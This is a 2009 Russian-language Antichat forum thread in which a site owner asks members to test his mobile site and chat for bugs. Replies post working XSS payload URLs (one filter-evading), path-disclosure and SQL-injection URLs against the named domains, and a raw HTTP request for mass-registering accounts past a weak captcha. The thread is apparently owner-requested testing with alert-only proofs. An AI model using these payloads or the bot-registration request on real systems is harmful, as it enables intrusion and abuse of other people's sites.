ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
Перезагрузить страницу Проверте на баги
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Проверте на баги
  #1  
Старый 11.01.2009, 12:28
Аватар для NAGAN
NAGAN
Новичок
Регистрация: 28.10.2008
Сообщений: 10
Провел на форуме:
25791

Репутация: 0
Post Проверте на баги
проверти на баги сайт для мобильных телефонов версии xhtml http://wapnn.org и чат http://chat.wapnn.org
 
Ответить с цитированием

  #2  
Старый 11.01.2009, 21:44
Аватар для NAGAN
NAGAN
Новичок
Регистрация: 28.10.2008
Сообщений: 10
Провел на форуме:
25791

Репутация: 0
По умолчанию
хм...хоть напишите что кавряли он ничего не на кавыряли а то сидиш как ботиног и ждеш!
 
Ответить с цитированием

  #3  
Старый 11.01.2009, 22:29
Аватар для mr.The
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию
Цитата:
Powered by JohnCMS
Цитата:
2. Сайт, заявку на рассмотрение которого вы оставляете должен содержать некую самописную часть.
кагбы б..
 
Ответить с цитированием

  #4  
Старый 11.01.2009, 22:51
Аватар для NAGAN
NAGAN
Новичок
Регистрация: 28.10.2008
Сообщений: 10
Провел на форуме:
25791

Репутация: 0
По умолчанию
вот по этому я и попросил проверить! а то что в ШАПКЕ скрипта написано так это остатки от движка! код Двига переделанный полностью! +чат написаный практически с 0! вроде все в рамках положенного!
 
Ответить с цитированием

  #5  
Старый 12.01.2009, 07:02
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию
XSS
http://wapnn.org/xxx_gallery/baz.php?f=132x176/Analnyj_seks/sbor1&p=2&ob='><script>alert()</script><noscript>&SID=qq496ab2376ffcbn355
-------------
Раскрытие путей: http://chat.wapnn.org/fr5.php?usid=-1'
------------
XSS
http://wapnn.org/ero_gallery/elem.php?r=240x320&c='>"><script>alert()</script><noscript>&d=11
------------
SQL-INJ и раскрытие путей
http://wapnn.org/sms/index.php?mod=show&cID=10&way=n&aID=-1
раскручивать не стал
Последний раз редактировалось BlackSun; 12.01.2009 в 07:44..
 
Ответить с цитированием

  #6  
Старый 12.01.2009, 10:27
Аватар для NAGAN
NAGAN
Новичок
Регистрация: 28.10.2008
Сообщений: 10
Провел на форуме:
25791

Репутация: 0
По умолчанию
Раскрытие путей: http://chat.wapnn.org/fr5.php?usid=-1' не понял по поводу этого где там происходит раскрытие путей! за все остальное плюс!
 
Ответить с цитированием

  #7  
Старый 12.01.2009, 11:56
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию
Цитата:
Сообщение от NAGAN  
Раскрытие путей: http://chat.wapnn.org/fr5.php?usid=-1' не понял по поводу этого где там происходит раскрытие путей! за все остальное плюс!
Ты пройди по ссылке, сохрани "картинку" и открой блонкнотом
 
Ответить с цитированием

  #8  
Старый 13.01.2009, 00:21
Аватар для TR0J@N
TR0J@N
Участник форума
Регистрация: 30.03.2007
Сообщений: 131
Провел на форуме:
1449774

Репутация: 127
Отправить сообщение для TR0J@N с помощью ICQ
По умолчанию
Регим армию пользователей)
Ну капча слишком простая, можно либо распознавать, и привязка сессия=КОД_КАПЧИ сохраняется!

Код:
POST http://wapnn.org/registration.php HTTP/1.0
Accept: */*
Referer: http://wapnn.org/registration.php
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0
Host: wapnn.org
Content-Length: 163
Pragma: no-cache
Cookie: SESID=ССЕСИЯ

nick=ЛОГИН&password=ПАСС&imname=ИМЯwd&sex=m&about=тратата&kod=КОД_КАПЧИ&submit=Регистрация
 
Ответить с цитированием

  #9  
Старый 13.01.2009, 02:28
Аватар для Xcontrol212
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


Отправить сообщение для Xcontrol212 с помощью ICQ
По умолчанию
XSS
Код:
http://chat.wapnn.org/enter.php?ver="><ScRiPt%20%0a%0d>alert(/XSS/);</ScRiPt>&ref=318409
Последний раз редактировалось Xcontrol212; 13.01.2009 в 02:30..
 
Ответить с цитированием

  #10  
Старый 13.01.2009, 21:12
Аватар для NAGAN
NAGAN
Новичок
Регистрация: 28.10.2008
Сообщений: 10
Провел на форуме:
25791

Репутация: 0
По умолчанию
Цитата:
Сообщение от BlackSun  
XSS
http://wapnn.org/xxx_gallery/baz.php?f=132x176/Analnyj_seks/sbor1&p=2&ob='><script>alert()</script><noscript>&SID=qq496ab2376ffcbn355

XSS
http://wapnn.org/ero_gallery/elem.php?r=240x320&c='>"><script>alert()</script><noscript>&d=11
------------
SQL-INJ и раскрытие путей
http://wapnn.org/sms/index.php?mod=show&cID=10&way=n&aID=-1
раскручивать не стал

хыхых прикол это раскрытие путей и inj на другой сайт! это через граберы! тема вообще!
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ